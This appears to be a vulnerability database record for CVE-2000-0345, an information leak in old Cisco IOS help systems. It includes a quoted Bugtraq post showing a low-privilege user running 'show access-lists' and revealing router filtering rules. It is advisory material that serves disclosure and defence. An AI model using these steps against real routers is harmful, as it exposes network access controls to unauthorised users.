ID

VAR-E-200005-0121


CVE

cve_id:CVE-2000-0345

Trust: 0.3

sources: BID: 1161

TITLE

Cisco Router Online Help Vulnerability

Trust: 0.3

sources: BID: 1161

DESCRIPTION

Under certain revisions of IOS multiple Cisco routers have an information leakage vulnerability in their online help systems. In essence this vulnerability allows users who currently have access to the router at a low level of privilege (users without access to the 'enable' password) can use the help system to view information which should only in theory be available to an 'enabled' user. This information is comprised of access lists among other things. The help system itself does not list these items as being available via the 'show' commands yet none the less it will execute them.
The message which detailed this vulnerability to the Bugtraq mailing list is attached in the 'Credit' section of this vulnerability entry. It is suggested that you read it if this vulnerability affects your infrastructure.

Trust: 0.3

sources: BID: 1161

AFFECTED PRODUCTS

vendor:ciscomodel:iosscope:eqversion:12.0.7

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:12.0.6

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:12.0.5

Trust: 0.3

vendor:ciscomodel:ios tscope:eqversion:12.0.4

Trust: 0.3

vendor:ciscomodel:ios sscope:eqversion:12.0.4

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:12.0.4

Trust: 0.3

vendor:ciscomodel:ios t2scope:eqversion:12.0.3

Trust: 0.3

vendor:ciscomodel:ios xgscope:eqversion:12.0.2

Trust: 0.3

vendor:ciscomodel:ios xfscope:eqversion:12.0.2

Trust: 0.3

vendor:ciscomodel:ios xdscope:eqversion:12.0.2

Trust: 0.3

vendor:ciscomodel:ios xcscope:eqversion:12.0.2

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:12.0.2

Trust: 0.3

vendor:ciscomodel:ios xescope:eqversion:12.0.1

Trust: 0.3

vendor:ciscomodel:ios xbscope:eqversion:12.0.1

Trust: 0.3

vendor:ciscomodel:ios xa3scope:eqversion:12.0.1

Trust: 0.3

vendor:ciscomodel:ios wscope:eqversion:12.0.1

Trust: 0.3

vendor:ciscomodel:ios bcscope:eqversion:11.2.10

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:11.2.10

Trust: 0.3

vendor:ciscomodel:ios xascope:eqversion:11.2.9

Trust: 0.3

vendor:ciscomodel:ios pscope:eqversion:11.2.9

Trust: 0.3

vendor:ciscomodel:ios sa5scope:eqversion:11.2.8

Trust: 0.3

vendor:ciscomodel:ios sa3scope:eqversion:11.2.8

Trust: 0.3

vendor:ciscomodel:ios sa1scope:eqversion:11.2.8

Trust: 0.3

vendor:ciscomodel:ios pscope:eqversion:11.2.8

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:11.2.8

Trust: 0.3

vendor:ciscomodel:ios f1scope:eqversion:11.2.4

Trust: 0.3

vendor:ciscomodel:ios ctscope:eqversion:11.1.17

Trust: 0.3

vendor:ciscomodel:ios ccscope:eqversion:11.1.17

Trust: 0.3

vendor:ciscomodel:ios iascope:eqversion:11.1.16

Trust: 0.3

vendor:ciscomodel:ios aascope:eqversion:11.1.16

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:11.1.16

Trust: 0.3

vendor:ciscomodel:ios cascope:eqversion:11.1.15

Trust: 0.3

vendor:ciscomodel:ios iascope:eqversion:11.1.13

Trust: 0.3

vendor:ciscomodel:ios cascope:eqversion:11.1.13

Trust: 0.3

vendor:ciscomodel:ios aascope:eqversion:11.1.13

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:11.1.13

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:9.14

Trust: 0.3

vendor:ciscomodel:ios 12.0tscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0sscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0dbscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0 sscope: - version: -

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:12.0(8)

Trust: 0.3

vendor:ciscomodel:ios 12.0 tscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.0 t1scope: - version: -

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:12.0

Trust: 0.3

vendor:ciscomodel:ios 11.2pscope: - version: -

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:11.2(17)

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:11.2

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:11.1

Trust: 0.3

vendor:ciscomodel:hsrpscope:eqversion:7500.0

Trust: 0.3

vendor:ciscomodel:hsrpscope:eqversion:7200.0

Trust: 0.3

vendor:ciscomodel:hsrpscope:eqversion:4000.0

Trust: 0.3

vendor:ciscomodel:hsrpscope:eqversion:3600.0

Trust: 0.3

vendor:ciscomodel:hsrpscope:eqversion:2600.0

Trust: 0.3

vendor:ciscomodel:hsrpscope:eqversion:2500.0

Trust: 0.3

vendor:ciscomodel: - scope:eqversion:7500

Trust: 0.3

vendor:ciscomodel: - scope:eqversion:7200

Trust: 0.3

vendor:ciscomodel: - scope:eqversion:4000

Trust: 0.3

vendor:ciscomodel: - scope:eqversion:3600

Trust: 0.3

vendor:ciscomodel: - scope:eqversion:2600

Trust: 0.3

vendor:ciscomodel: - scope:eqversion:2500

Trust: 0.3

sources: BID: 1161

EXPLOIT

As taken from the original post on this vulnerability (See the Credit Section):
Routers tested: 2500, 2600, 3600, 4000, 7200, 7500 series,
running IOS 9.14, 11.1(21) (Distributed Director), 11.2(x)
and 12.0(x). Some were tested on the local console, some
over Telnet. We recently tested PIX 4.x, and found it was
NOT vulnerable.
A regular user will log-on with privilege level equal to 1.
This can be shown by running "show privilege" after logging
on the router. For example:
User Access Verification
Username: joeuser
Password: <password>
Router2>sh priv
Current privilege level is 1
Router2>
Now, if we try to get a list of all possible "show"
commands, by doing "show ?", we get:
Router2>show privilege
Current privilege level is 1
Router2>show ?
backup Backup status
cef Cisco Express Forwarding
clock Display the system clock
dialer Dialer parameters and statistics
flash: display information about flash: file
system
history Display the session command history
...
Notice that we did not see an "access-lists" option, so the
help system thinks we should not be able to run it...
However,
Router2>show privilege
Current privilege level is 1
Router2>show access-lists
Standard IP access list 10
permit 172.16.0.1
deny any
Extended IP access list eth0-IN
permit udp host 172.16.0.1 10.11.12.0 0.0.0.255 eq
snmp (14982 matches)
permit udp host 172.16.0.1 10.11.13.128 0.0.0.127 eq
snmp (4026 matches)
So, we can see the configuration, even though we shouldn't.
We can't alter it, but even seeing the access-list is
beneficial to an attacker.
Upon further testing on a 3640 running IOS 12.0(5), we got
the following results:
- We found 75 "show" commands that are supposed to be
available only in enable mode. Meaning: the difference
between "show ?" in enabled and disabled mode was this 75
commands
- Out of 75, only 13 were truly restricted. The other 62
were available to be viewed by a session in a disabled mode.
- Out of the 62 that were viewable, we counted 7 as being
potentially very dangerous. "show ip" is one of them, as
well as "show cdp", "show logging", "show cdp", "show
vlans". There are others, but I don't have my list with me
right now.
- By combining "show ip" and "show access-lists" we had a
very clear picture of how access-lists were distributed in
the router.

Trust: 0.3

sources: BID: 1161

PRICE

Free

Trust: 0.3

sources: BID: 1161

TYPE

Access Validation Error

Trust: 0.3

sources: BID: 1161

CREDITS

This bug was discovered and documented by Fernando Montenegro fsmontenegro@iname.com and Claudio Silotto (csilotto@hotmail.com). The message detailing this vulnerability was sent to the Bugtraq mailing list on 2 May 2000.

Trust: 0.3

sources: BID: 1161

EXTERNAL IDS

db:NVDid:CVE-2000-0345

Trust: 0.3

db:BIDid:1161

Trust: 0.3

sources: BID: 1161

REFERENCES

url:http://www.cisco.com/warp/public/707/sec_incident_response.shtml

Trust: 0.3

sources: BID: 1161

SOURCES

db:BIDid:1161

LAST UPDATE DATE

2022-07-27T09:51:18.831000+00:00


SOURCES UPDATE DATE

db:BIDid:1161date:2009-07-11T01:56:00

SOURCES RELEASE DATE

db:BIDid:1161date:2000-05-03T00:00:00